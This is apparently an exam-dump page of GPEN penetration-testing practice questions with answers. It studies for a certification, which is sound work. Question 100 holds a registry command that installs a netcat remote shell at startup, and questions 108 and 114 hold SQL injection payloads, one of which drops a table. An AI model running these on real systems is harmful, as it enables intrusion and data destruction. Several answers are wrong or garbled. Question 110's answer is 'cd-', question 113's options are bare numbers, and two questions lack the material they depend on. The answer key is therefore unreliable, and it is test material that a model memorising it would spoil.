[UPDATED Feb-2024] Best Value Available Preparation Guide for GPEN Exam
The GPEN certification exam is designed to evaluate the skills and knowledge of individuals in the field of penetration testing. It tests individuals on their knowledge of modern penetration testing methodology, techniques, tools, and technologies. It covers topics such as threat modeling, perimeter security, web application security, network security and much more.
GIAC GPEN certification exam is a challenging and rigorous exam that tests a candidate’s knowledge and skills in the field of penetration testing. Candidates who pass the exam are recognized as experts in the field and are highly valued by employers and clients. If you are a cybersecurity professional looking to validate your skills and increase your career prospects in the field of penetration testing, the GPEN certification is an excellent option to consider.
NEW QUESTION # 96
SIMULATION
Fill in the blank with the appropriate act name.
The ___ act gives consumers the right to ask emailers to stop spamming them.
Answer: CAN-SPAM
NEW QUESTION # 97
All of the following are advantages of using the Metasploit priv module for dumping hashes from a local Windows machine EXCEPT:
- A. LSASS related reboot problems aren't an issue
- B. Doesn't require SMB or NetBIOS access to the target machine
- C. Provides less evidence for forensics investigators to recover
- D. Can run inside of a process owned by any user
Answer: D
Reference:
http://www.vita.virginia.gov/uploadedFiles/VITA_Main_Public/Security/Meetings/ISOAG/2012/2012_Jan_ISOAG.pdf
NEW QUESTION # 98
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of the tool is as follows:
Which of the following tools is John using to crack the wireless encryption keys?
- A. Kismet
- B. Cain
- C. AirSnort
- D. PsPasswd
Answer: C
NEW QUESTION # 99
You run the following command while using Nikto Web scanner:
perl nikto.pl -h 192.168.0.1 -p 443
What action do you want to perform?
- A. Setting Nikto for network sniffing.
- B. Port scanning.
- C. Using it as a proxy server.
- D. Updating Nikto.
Answer: B
NEW QUESTION # 100
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
- A. You want to set Netcat to execute the command at any time.
- B. You want to add the Netcat command to the Windows registry.
- C. You want to put Netcat in the stealth mode.
- D. You want to perform banner grabbing.
Answer: A,B,C
NEW QUESTION # 101
Adam works on a Linux system. He is using Sendmail as the primary application to transmit emails.
Linux uses Syslog to maintain logs of what has occurred on the system. Which of the following log files contains e-mail information such as source and destination IP addresses, date and time stamps, etc.?
- A. /var/log/mailog
- B. /log/var/logd
- C. /var/log/logmail
- D. /log/var/mailog
Answer: A
NEW QUESTION # 102
Which of the following worms performs random scanning?
- A. BugBear
- B. Code Red worm
- C. Klez
- D. SirCam
Answer: B
NEW QUESTION # 103
What section of the penetration test or ethical hacking engagement final report is used to detail and prioritize the results of your testing?
- A. Executive Summary
- B. Conclusions
- C. Findings
- D. Methodology
Answer: A
Explanation:
Section: Volume A
NEW QUESTION # 104
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. In order to do so, he performs the following steps of the pre-attack phase successfully:
Information gathering
Determination of network range
Identification of active systems
Location of open ports and applications
Now, which of the following tasks should he perform next?
- A. Perform OS fingerprinting on the We-are-secure network.
- B. Install a backdoor to log in remotely on the We-are-secure server.
- C. Map the network of We-are-secure Inc.
- D. Fingerprint the services running on the we-are-secure network.
Answer: A
Explanation:
Section: Volume C
NEW QUESTION # 105
You work as a Network Administrator for Tech Perfect Inc. The company has a Windows Active Directory-based single domain single forest network. The functional level of the forest is Windows Server 2003. The company has recently provided laptops to its sales team members. You have configured access points in the network to enable a wireless network. The company's security policy states that all users using laptops must use smart cards for authentication. Which of the following authentication techniques will you use to implement the security policy of the company?
- A. Pre-shared key
- B. IEEE 802.1X using EAP-TLS
- C. IEEE 802.1X using PEAP-MS-CHAP
- D. Open system
Answer: B
NEW QUESTION # 106
Which of the following are the drawbacks of the NTLM Web authentication scheme?
Each correct answer represents a complete solution. Choose all that apply.
- A. The password is sent in hashed format to the Web server.
- B. It can be brute forced easily.
- C. The password is sent in clear text format to the Web server.
- D. It works only with Microsoft Internet Explorer.
Answer: B,D
NEW QUESTION # 107
You work as a Network Security Analyzer. You got a suspicious email while working on a forensic project. Now, you want to know the IP address of the sender so that you can analyze various information such as the actual location, domain information, operating system being used, contact information, etc. of the email sender with the help of various tools and resources. You also want to check whether this email is fake or real. You know that analysis of email headers is a good starting point in such cases. The email header of the suspicious email is given below:
What is the IP address of the sender of this email?
- A. 141.1.1.1
- B. 172.16.10.90
- C. 216.168.54.25
- D. 209.191.91.180
Answer: C
NEW QUESTION # 108
While performing a code audit, you discover a SQL injection vulnerability. Assuming the following vulnerable query, what user input could be injected to make the query true and return data?
select * from widgets where name = '[user-input]';
- A. 'or 1=1
- B. `or l=l...
- C. 'or 1=1--
- D. `or l=1'
Answer: D
NEW QUESTION # 109
Which of the following tools can be used to enumerate networks that have blocked ICMP Echo packets but have failed to block timestamp or information packets, or that are not sniffing trusted addresses, and that also supports spoofing and promiscuous listening for reply packets?
- A. Nessus
- B. Zenmap
- C. Icmpenum
- D. Nmap
Answer: C
NEW QUESTION # 110
You are pen testing a Windows system remotely via a raw netcat shell. You want to quickly change directories to where the Windows operating system resides. What command could you use?
- A. cd /systemroot/
- B. cd-
- C. cd %systemroot%
- D. cd systemroot
Answer: B
NEW QUESTION # 111
Which of the following statements are true about KisMAC?
- A. Data generated by KisMAC can also be saved in pcap format.
- B. It scans for networks passively on supported cards.
- C. It cracks WEP and WPA keys by Rainbow attack or by dictionary attack.
- D. It is a wireless network discovery tool for Mac OS X.
Answer: A,B,D
NEW QUESTION # 112
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. In order to do so, he performs the following steps of the pre-attack phase successfully:
Information gathering
Determination of network range
Identification of active systems
Location of open ports and applications
Now, which of the following tasks should he perform next?
- A. Perform OS fingerprinting on the We-are-secure network.
- B. Install a backdoor to log in remotely on the We-are-secure server.
- C. Map the network of We-are-secure Inc.
- D. Fingerprint the services running on the we-are-secure network.
Answer: A
NEW QUESTION # 113
Which of the following is the number of bits of encryption that 64-bit Wired Equivalent Privacy (WEP) effectively provides?
- A. 0
- B. 1
- C. 2
- D. 3
Answer: B
Explanation:
Section: Volume A
Explanation/Reference:
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
NEW QUESTION # 114
You work as a Network Penetration Tester at Secure Inc. Your company takes on projects to test the security of various companies. Recently, Secure Inc. has assigned you a project to test the security of a Web site. You go to the Web site login page and you run the following SQL query:
SELECT email, passwd, login_id, full_name
FROM members
WHERE email = '[email protected]'; DROP TABLE members; --'
What task will the above SQL query perform?
- A. Deletes the entire members table.
- B. Deletes the rows of members table where email id is '[email protected]' given.
- C. Performs the XSS attacks.
- D. Deletes the database in which members table resides.
Answer: A
NEW QUESTION # 115
As a professional hacker, you want to crack the security of secureserver.com. For this, in the information gathering step, you performed scanning with the help of the nmap utility to retrieve as many different protocols as possible being used by secureserver.com, so that you could get accurate knowledge about what services were being used by secureserver.com. Which of the following nmap switches have you used to accomplish the task?
- A. nmap -sS
- B. nmap -sT
- C. nmap -vO
- D. nmap -sO
Answer: D
NEW QUESTION # 116
Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?
- A. SARA
- B. Nmap
- C. Whisker
- D. Nessus
Answer: D
Explanation:
Section: Volume C
NEW QUESTION # 117
You want to integrate the Nikto tool with the Nessus vulnerability scanner. Which of the following steps will you take to accomplish the task?
Each correct answer represents a complete solution. Choose two.
- A. Place the directory containing nikto.pl in root's PATH environment variable.
- B. Place nikto.pl file in the /etc/nessus directory.
- C. Place nikto.pl file in the /var/www directory.
- D. Restart nessusd service.
Answer: A,D
NEW QUESTION # 118
Which of the following Penetration Testing steps includes network mapping and OS fingerprinting?
- A. Exploit
- B. Gather information
- C. Planning stage
- D. Verify vulnerabilities
Answer: B
NEW QUESTION # 119
The employees of EWS Inc. require remote access to the company's Web servers. In order to provide solid wireless security, the company uses EAP-TLS as the authentication protocol. Which of the following statements are true about EAP-TLS?
Each correct answer represents a complete solution. Choose all that apply.
- A. It provides a moderate level of security.
- B. It is supported by all manufacturers of wireless LAN hardware and software.
- C. It uses password hash for client authentication.
- D. It uses a public key certificate for server authentication.
Answer: B,D
Explanation:
Section: Volume B
NEW QUESTION # 120
......
GIAC GPEN certification exam is a valuable credential for professionals who want to demonstrate their advanced skills in penetration testing. Obtaining this certification helps professionals stand out in the field of cybersecurity and demonstrates their commitment to upholding the highest standards of ethical conduct. With the ever-increasing threat of cyber-attacks, organizations need professionals with expertise in penetration testing to help identify and mitigate risk. The GPEN exam provides the necessary training and evaluation to ensure professionals are adequately equipped to perform this role.